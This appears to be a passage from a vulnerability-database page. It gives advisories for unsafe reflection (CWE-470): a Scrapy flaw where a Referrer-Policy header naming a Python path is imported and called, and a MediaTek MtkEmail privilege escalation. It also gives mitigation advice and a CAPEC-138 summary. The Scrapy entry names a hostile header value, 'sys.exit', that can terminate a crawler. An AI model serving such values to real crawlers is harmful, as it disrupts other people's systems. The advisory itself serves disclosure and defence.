  • set the meta key in start requests and use the scrapy-sticky-meta-params plugin to propagate it to follow-up requests.

If you want to continue respecting legitimate Referrer-Policy headers while protecting against malicious ones, disable the built-in referrer policy middleware by setting it to None in SPIDER_MIDDLEWARES and replace it with the fixed implementation from Scrapy 2.14.2.

If the Scrapy 2.14.2 implementation is incompatible with your project (for example, because your Scrapy version is older), copy the corresponding middleware from your Scrapy version, apply the same patch, and use that as a replacement.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.14.1"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "Scrapy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.4.0"
            },
            {
              "fixed": "2.14.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-470"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:02:36Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Impact\n\nSince version 1.4.0, Scrapy respects the `Referrer-Policy` response header to decide whether and how to set a `Referer` header on follow-up requests.\n\nIf the header value looked like a valid Python import path, Scrapy would import the referenced object and call it, assuming it referred to a referrer policy class (for example, `scrapy.spidermiddlewares.referer.DefaultReferrerPolicy`) and attempting to instantiate it to handle the `Referer` header.\n\nA malicious site could exploit this by setting `Referrer-Policy` to a path such as `sys.exit`, causing Scrapy to import and execute it and potentially terminate the process.\n\n### Patches\n\nUpgrade to Scrapy 2.14.2 (or later).\n\n### Workarounds\n\nIf you cannot upgrade to Scrapy 2.14.2, consider the following mitigations.\n\n- **Disable the middleware:** If you don\u0027t need the `Referer` header on follow-up requests, set [`REFERER_ENABLED`](https://docs.scrapy.org/en/latest/topics/spider-middleware.html#referer-enabled) to `False`.\n- **Set headers manually:** If you do need a `Referer`, disable the middleware and set the header explicitly on the requests that require it.\n- **Set `referrer_policy` in request metadata:** If disabling the middleware is not viable, set the [`referrer_policy`](https://docs.scrapy.org/en/latest/topics/spider-middleware.html#referrer-policy) request meta key on all requests to prevent evaluating preceding responses\u0027 `Referrer-Policy`. For example:\n\n```python\nRequest(\n    url,\n    meta={\n        \"referrer_policy\": \"scrapy.spidermiddlewares.referer.DefaultReferrerPolicy\",\n    },\n)\n```\n\nInstead of editing requests individually, you can:\n\n- implement a custom [spider middleware](https://docs.scrapy.org/en/latest/topics/spider-middleware.html) that runs before the built-in referrer policy middleware and sets the `referrer_policy` meta key; or\n- set the meta key in start requests and use the [scrapy-sticky-meta-params](https://github.com/heylouiz/scrapy-sticky-meta-params) plugin to propagate it to follow-up requests.\n\nIf you want to continue respecting legitimate `Referrer-Policy` headers while protecting against malicious ones, disable the built-in referrer policy middleware by setting it to `None` in [`SPIDER_MIDDLEWARES`](https://docs.scrapy.org/en/latest/topics/settings.html#std-setting-SPIDER_MIDDLEWARES) and replace it with the fixed implementation from Scrapy 2.14.2.\n\nIf the Scrapy 2.14.2 implementation is incompatible with your project (for example, because your Scrapy version is older), copy the corresponding middleware from your Scrapy version, apply the same patch, and use that as a replacement.",
  "id": "GHSA-cwxj-rr6w-m6w7",
  "modified": "2026-03-13T20:02:36Z",
  "published": "2026-03-13T20:02:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/scrapy/scrapy/security/advisories/GHSA-cwxj-rr6w-m6w7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/scrapy/scrapy/commit/945b787a263586cb5803c01c6da57daad8997ae5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/scrapy/scrapy"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Scrapy: Arbitrary Module Import via Referrer-Policy Header in RefererMiddleware"
}

GHSA-CX2H-XJFW-V87Q

Vulnerability from github – Published: 2022-09-07 00:01 – Updated: 2022-09-10 00:00
VLAI
Details

In MtkEmail, there is a possible escalation of privilege due to fragment injection. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07216598; Issue ID: ALPS07216598.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-26469"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-470"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-09-06T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "In MtkEmail, there is a possible escalation of privilege due to fragment injection. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07216598; Issue ID: ALPS07216598.",
  "id": "GHSA-cx2h-xjfw-v87q",
  "modified": "2022-09-10T00:00:35Z",
  "published": "2022-09-07T00:01:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26469"
    },
    {
      "type": "WEB",
      "url": "https://corp.mediatek.com/product-security-bulletin/September-2022"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Refactor your code to avoid using reflection.

Mitigation
Architecture and Design

Do not use user-controlled inputs to select and load classes or code.

Mitigation
Implementation

Apply strict input validation by using allowlists or indirect selection to ensure that the user is only selecting allowable classes or code.

CAPEC-138: Reflection Injection

An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.